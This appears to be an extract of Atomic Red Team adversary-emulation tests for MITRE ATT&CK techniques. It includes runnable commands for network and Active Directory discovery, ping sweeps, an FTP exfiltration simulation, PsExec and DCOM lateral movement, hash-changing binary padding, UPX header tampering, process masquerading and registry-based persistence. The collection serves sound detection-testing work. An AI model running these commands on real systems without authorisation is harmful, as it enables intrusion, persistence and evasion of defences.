if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi; if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi; if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi; if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
Description: Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
Prereq: Check if arp command exists on the machine
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
T1016 - System Network Configuration Discovery
System Network Configuration Discovery (TrickBot Style)
ipconfig /all net config workstation net view /all /domain nltest /domain_trusts
Description: Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
T1016 - System Network Configuration Discovery
List Open Egress Ports
$ports = Get-content "T1016\src\top-128.txt" $file = "$env:USERPROFILE\Desktop\open-ports.txt" $totalopen = 0 $totalports = 0 New-Item $file -Force foreach ($port in $ports) { $test = new-object system.Net.Sockets.TcpClient $wait = $test.beginConnect("allports.exposed", $port, $null, $null) $wait.asyncwaithandle.waitone(250, $false) | Out-Null $totalports++ | Out-Null if ($test.Connected) { $result = "$port open" Write-Host -ForegroundColor Green $result $result | Out-File -Encoding ASCII -append $file $totalopen++ | Out-Null } else { $result = "$port closed" Write-Host -ForegroundColor Red $result $totalclosed++ | Out-Null $result | Out-File -Encoding ASCII -append $file } } $results = "There were a total of $totalopen open ports out of $totalports ports tested." $results | Out-File -Encoding ASCII -append $file Write-Host $results
Description: This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
Prereq: Test requires T1016\src\top-128.txt to exist
if (Test-Path "T1016\src\top-128.txt") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1016 - System Network Configuration Discovery
Qakbot Recon
"T1016\src\qakbot.bat"
Description: A list of commands known to be performed by Qakbot for recon purposes
Prereq: File to copy must exist on disk at specified location (T1016\src\qakbot.bat)
if (Test-Path "T1016\src\qakbot.bat") {exit 0} else {exit 1}
Description: "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
Description: Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
T1018 - Remote System Discovery
Remote System Discovery - net
net view /domain net view
Description: Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
T1018 - Remote System Discovery
Remote System Discovery - net group Domain Computers
net group "Domain Computers" /domain
Description: Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - nltest
nltest.exe /dclist:%userdnsdomain%
Description: Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - ping sweep
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
Description: Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - arp
arp -a
Description: Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - arp nix
arp -a | grep -v '^?'
Description: Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
Prereq: Check if arp command exists on the machine
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Remote System Discovery - sweep
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
Description: Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
Description: Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1018 - Remote System Discovery
Adfind - Enumerate Active Directory Domain Controller Objects
"..\ExternalPayloads\AdFind.exe" None -sc dclist
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1018 - Remote System Discovery
Remote System Discovery - ip neighbour
ip neighbour show
Description: Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.
Prereq: Check if ip command exists on the machine
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Remote System Discovery - ip route
ip route show
Description: Use the ip route command to display the kernels routing tables.
Prereq: Check if ip command exists on the machine
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Remote System Discovery - netstat
netstat -r | grep default
Description: Use the netstat command to display the kernels routing tables.
T1018 - Remote System Discovery
Remote System Discovery - ip tcp_metrics
ip tcp_metrics show |grep --invert-match "^127\."
Description: Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.
Prereq: Check if ip command exists on the machine
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Enumerate domain computers within Active Directory using DirectorySearcher
Description: This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain.
This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement.
Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks).
Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
Enumerate Active Directory Computers with Get-AdComputer
Get-AdComputer -Filter *
Description: The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
Upon successful execution a listing of Computers will output with their paths in AD.
Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
T1018 - Remote System Discovery
Enumerate Active Directory Computers with ADSISearcher
Description: The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
Upon successful execution a listing of computers will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
Description: Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
Description: The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
T1018 - Remote System Discovery
Remote System Discovery - net group Domain Controller
net group /domain "Domain controllers"
Description: Identify remote systems with net.exe querying the Active Directory Domain Controller.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.
$sampleData = "Sample data for exfiltration test" Set-Content -Path "C:\temp\T1020__FTP_sample.txt" -Value $sampleData $ftpUrl = "ftp://example.com" $creds = Get-Credential -Credential "[user:password]" Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "C:\temp\T1020__FTP_sample.txt" -Credential $creds
Description: Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
Description: Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt
Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/
See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
Description: Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
Prereq: PsExec tool from Sysinternals must exist on disk at specified location (..\ExternalPayloads\PsExec.exe)
if (Test-Path "..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
Description: Powershell lateral movement using the mmc20 application com object.
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
Upon successful execution, cmd will spawn calc.exe on a remote computer.
T1021.003 - Remote Services: Distributed Component Object Model
PowerShell Lateral Movement Using Excel Application Object
Description: Powershell lateral movement using the Excel COM objects.
Reference:
https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
Upon successful execution, cmd will spawn calc.exe on a remote computer.
Description: An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Description: ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer.
Adversaries can abuse ARD to gain remote code execution and perform lateral movement.
References: https://www.mandiant.com/resources/blog/leveraging-apple-remote-desktop-for-good-and-evil
Description: Simulate lateral movement with PowerShell Remoting on the local host.
Upon successful execution, PowerShell will execute `whoami` using `Invoke-Command`, targeting the
local machine as remote target.
Cleanup:
Disable-PSRemoting -Force
T1021.006 - Remote Services: Windows Remote Management
Description: This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files
(e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files
matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics
how adversaries might scan for sensitive documents on removable devices for exfiltration or analysis.
T1027.001 - Obfuscated Files or Information: Binary Padding
Pad Binary to Change Hash - Linux/macOS dd
dd if=/dev/zero bs=1 count=1 >> /tmp/evil-binary #adds null bytes dd if=/dev/random bs=1 count=1 >> /tmp/evil-binary #adds high-quality random data dd if=/dev/urandom bs=1 count=1 >> /tmp/evil-binary #adds low-quality random data
Description: Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
Prereq: The binary must exist on disk at specified location (/tmp/evil-binary)
if [ -f /tmp/evil-binary ]; then exit 0; else exit 1; fi;
Cleanup:
rm /tmp/evil-binary
T1027.001 - Obfuscated Files or Information: Binary Padding
Pad Binary to Change Hash using truncate command - Linux/macOS
truncate -s +1 /tmp/evil-binary #adds a byte to the file size
Description: Uses truncate to add a byte to the binary to change the hash.
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
Prereq: The binary must exist on disk at specified location (/tmp/evil-binary)
if [ -f /tmp/evil-binary ]; then exit 0; else exit 1; fi;
Cleanup:
rm /tmp/evil-binary
T1027.002 - Obfuscated Files or Information: Software Packing
Description: Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
Cleanup:
rm /tmp/packed_bin
T1027.002 - Obfuscated Files or Information: Software Packing
Binary packed by UPX, with modified headers (linux)
Description: Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
Cleanup:
rm /tmp/packed_bin
T1027.002 - Obfuscated Files or Information: Software Packing
Description: Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
Cleanup:
rm /tmp/packed_bin
T1027.002 - Obfuscated Files or Information: Software Packing
Description: Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
Cleanup:
rm /tmp/packed_bin
T1027.004 - Obfuscated Files or Information: Compile After Delivery
Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
Prereq: exe file must exist on disk at specified location (T1027.004\bin\T1027.004_DynamicCompile.exe)
if (Test-Path "T1027.004\bin\T1027.004_DynamicCompile.exe") {exit 0} else {exit 1}
T1027.004 - Obfuscated Files or Information: Compile After Delivery
Description: Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
Prereq: the source file must exist on disk at specified location (T1027.004/src/T1027-004-test.cc)
if [ -e T1027.004/src/T1027-004-test.cc ]; then exit 0; else exit 1; fi
T1027.004 - Obfuscated Files or Information: Compile After Delivery
Go compile
go run T1027.004/src/T1027-004-test.go
Description: Compile a go file with golang on FreeBSD, Linux or Macos.
Prereq: the source file must exist on disk at specified location (T1027.004/src/T1027-004-test.go)
if [ -e T1027.004/src/T1027-004-test.go ]; then exit 0; else exit 1; fi
T1027.006 - HTML Smuggling
HTML Smuggling Remote Payload
& "T1027.006\bin\T1027_006_remote.html"
Description: The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction.
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
Prereq: T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
if (Test-Path "T1027.006\bin\T1027_006_Remote.html") { exit 0} else { exit 1}
Description: This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper.
Prereq: Portable Executable to run must exist at specified location (T1027.007\bin\ninja_syscall1.exe)
if (Test-Path "T1027.007\bin\ninja_syscall1.exe") {exit 0} else {exit 1}
Description: Creates a base64-encoded data file and decodes it into an executable shell script
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team`
and uname -v
Prereq: encode the command into base64 file
if [ -e "/tmp/encoded.dat" ]; then exit 0; else exit 1; fi
Description: Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
T1027 - Obfuscated Files or Information
Execute base64-encoded PowerShell from Windows Registry
Description: Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute encoded command and read/write from the registry.
Description: Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
T1027 - Obfuscated Files or Information
DLP Evasion via Sensitive Data in VBA Macro over HTTP
Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body "T1027\src\T1027-cc-macro.xlsm"
Description: Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
Description: This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
T1027 - Obfuscated Files or Information
Obfuscated Command Line using special Unicode characters
{MISSING IN ATOMIC RED TEAM}
Description: This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).
Reference:
https://wietze.github.io/blog/windows-command-line-obfuscation
Description: The following Atomic Test will create a file with a specific name and sets its attributes to Hidden, System, and Archive. This was related to the Snake Malware campaign and is later decrypted by Snake's kernel driver.
[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
Description: Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/
Prereq: T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js
if (Test-Path "..\ExternalPayloads\temp_T1027js.zip\T1027js.js") {exit 0} else {exit 1}
Cleanup:
taskkill /f /im calculator.exe >nul 2>nul
T1030 - Data Transfer Size Limits
Data Transfer Size Limits
cd /tmp/T1030; split -b 5000000 T1030_urandom ls -l /tmp/T1030
Description: Take a file/directory, split it into 5Mb chunks
Prereq: The file must exist for the test to run.
if [ ! -f /tmp/T1030/T1030_urandom ]; then exit 1; else exit 0; fi;
Cleanup:
if [ -f /tmp/T1030/safe_to_delete ]; then rm -rf /tmp/T1030; fi;
Description: Simulate transferring data over a network in small chunks to evade detection.
T1033 - System Owner/User Discovery
System Owner/User Discovery
cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:"localhost" quser qwinsta.exe /server:localhost qwinsta.exe for /F "tokens=1,2" %i in ('qwinsta /server:localhost ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
Description: Identify System owner or users on an endpoint.
Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout.
Additionally, two files will be written to disk - computers.txt and usernames.txt.
T1033 - System Owner/User Discovery
System Owner/User Discovery
users w who
Description: Identify System owner or users on an endpoint
Upon successful execution, sh will stdout list of usernames.
T1033 - System Owner/User Discovery
Find computers where user has session - Stealth mode (PowerView)
Description: SocGholish performs whoami discovery commands and outputs the results to a tmp file.
The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
Cleanup:
Remove-Item -Path $env:temp\rad*.tmp -Force
T1033 - System Owner/User Discovery
System Owner/User Discovery Using Command Prompt
set file=$env:temp\user_info_%random%.tmp echo Username: %USERNAME% > %file% echo User Domain: %USERDOMAIN% >> %file% net users >> %file% query user >> %file%
Description: Identify the system owner or current user using native Windows command prompt utilities.
Description: Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
Description: Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
Upon successful execution, sh is renamed to `crond` and executed.
Description: Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
Description: Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
Prereq: Wscript file to execute must exist on disk
if (Test-Path "..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") {exit 0} else {exit 1}
Cleanup:
del /Q /F %APPDATA%\svchost.exe >nul 2>&1
T1036.003 - Masquerading: Rename System Utilities
Masquerading - powershell.exe running as taskhostw.exe
Description: Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
Cleanup:
del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
T1036.003 - Masquerading: Rename System Utilities
Masquerading - non-windows exe running as windows exe
Description: Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.
Prereq: Exe file to copy must exist on disk at specified location (T1036.003\bin\T1036.003.exe)
if (Test-Path "T1036.003\bin\T1036.003.exe") {exit 0} else {exit 1}
Description: Detect LSM running from an incorrect directory and an incorrect service account
This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.
Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
Cleanup:
del C:\T1036.003.txt >nul 2>&1 del C:\lsm.exe >nul 2>&1
T1036.004 - Masquerading: Masquerade Task or Service
Creating W32Time similar named service using schtasks
Description: Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
Cleanup:
sc delete win32times
T1036.004 - Masquerading: Masquerade Task or Service
linux rename /proc/pid/comm using prctl
/tmp/T1036_004_prctl_rename & ps TMP=`ps | grep totally_legit` if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi exit 0
Description: Runs a C program that calls prctl(PR_SET_NAME) to modify /proc/pid/comm value to "totally_legit". This will show up as process name in simple 'ps' listings.
Prereq: /tmp/T1036_004_prctl_rename must be exist on system.
stat /tmp/T1036_004_prctl_rename
Cleanup:
rm -f /tmp/T1036_004_prctl_rename
T1036.004 - Masquerading: Masquerade Task or Service
T1036.005 - Masquerading: Match Legitimate Name or Location
Execute a process from a directory masquerading as the current parent directory
mkdir $HOME/... cp $(which sh) $HOME/... $HOME/.../sh -c "echo Hello from the Atomic Red Team test T1036.005#1"
Description: Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
Cleanup:
rm -f $HOME/.../sh rmdir $HOME/.../
T1036.005 - Masquerading: Match Legitimate Name or Location
Masquerade as a built-in system executable
Add-Type -TypeDefinition @' public class Test { public static void Main(string[] args) { System.Console.WriteLine("tweet, tweet"); } } '@ -OutputAssembly "$Env:windir\Temp\svchost.exe"
T1036.005 - Masquerading: Match Legitimate Name or Location
Masquerading cmd.exe as VEDetector.exe
# Copy and rename cmd.exe to VEDetector.exe Copy-Item -Path "$env:SystemRoot\System32\cmd.exe" -Destination "$env:TEMP\VEDetector.exe" -Force
# Create registry run key for persistence New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "$env:TEMP\VEDetector.exe" -PropertyType String -Force
# Start the renamed process Start-Process -FilePath "$env:TEMP\VEDetector.exe"
Start-Sleep -Seconds 5
Description: This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
This technique may be used to evade detection by mimicking legitimate software names or locations.
**Expected Output:**
- A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
- SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
- Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
**References:**
- [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
- [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
Prereq: The source cmd.exe file must exist on the system.
Description: download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.
e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
Prereq: File to copy must exist on disk at specified location (T1036.007\src\T1036.007_masquerading.vbs)
if (Test-Path "T1036.007\src\T1036.007_masquerading.vbs") {exit 0} else {exit 1}
Prereq: File to copy must exist on disk at specified location (T1036.007\src\T1036.007_masquerading.ps1)
if (Test-Path "T1036.007\src\T1036.007_masquerading.ps1") {exit 0} else {exit 1}
Cleanup:
del /f %temp%\T1036.007_masquerading.docx.exe > nul 2>&1 del /f %temp%\T1036.007_masquerading.pdf.exe > nul 2>&1 del /f %temp%\T1036.007_masquerading.ps1.exe > nul 2>&1 del /f %temp%\T1036.007_masquerading.xls.vbs > nul 2>&1 del /f %temp%\T1036.007_masquerading.xlsx.vbs > nul 2>&1 del /f %temp%\T1036.007_masquerading.png.vbs > nul 2>&1 del /f %temp%\T1036.007_masquerading.doc.ps1 > nul 2>&1 del /f %temp%\T1036.007_masquerading.pdf.ps1 > nul 2>&1 del /f %temp%\T1036.007_masquerading.rtf.ps1 > nul 2>&1
Description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
Description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
Prereq: Zip file must be present.
if (Test-Path "..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)
Logon Scripts
echo "echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt" > %temp%\art.bat REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "%temp%\art.bat" /f
Description: Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
that can be viewed in the Registry Editor.
Cleanup:
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 del %temp%\art.bat >nul 2>&1 del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
T1037.002 - Boot or Logon Initialization Scripts: Logon Script (Mac)
Logon Scripts - Mac
{MISSING IN ATOMIC RED TEAM}
Description: Mac logon script
T1037.004 - Boot or Logon Initialization Scripts: Rc.common
Description: Modify or create an file in /Library/StartupItems
[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
Cleanup:
sudo rm /Library/StartupItems/EvilStartup.plist
T1037.005 - Boot or Logon Initialization Scripts: Startup Items
Description: Add launch script to /Library/StartupItems to launch agent
[Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
Prereq: /Library/StartupItems must exist
if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems; exit 0; fi;
Prereq: The shared library must exist on disk at specified location ($T1037.005/src/T1037_005_daemon.plist)
if [ -f $T1037.005/src/T1037_005_daemon.plist ]; then exit 0; else exit 1; fi;
Prereq: The startup script must exist on disk at specified location ($T1037.005/src/T1037.005_daemon.sh)
if [ -f $T1037.005/src/T1037.005_daemon.sh ]; then exit 0; else exit 1; fi;
Description: Add launch script to /Library/StartupItems to launch agent
[Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
Prereq: /Library/StartupItems must exist
if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems; exit 0; fi;
Prereq: The shared library must exist on disk at specified location ($T1037.005/src/T1037_005_agent.plist)
if [ -f $T1037.005/src/T1037_005_agent.plist ]; then exit 0; else exit 1; fi;
Prereq: The startup script must exist on disk at specified location ($T1037.005/src/T1037.005_agent.sh)
if [ -f $T1037.005/src/T1037.005_agent.sh ]; then exit 0; else exit 1; fi;
Description: Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
Prereq: Check if at least one of tcpdump or tshark is installed.
Description: Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
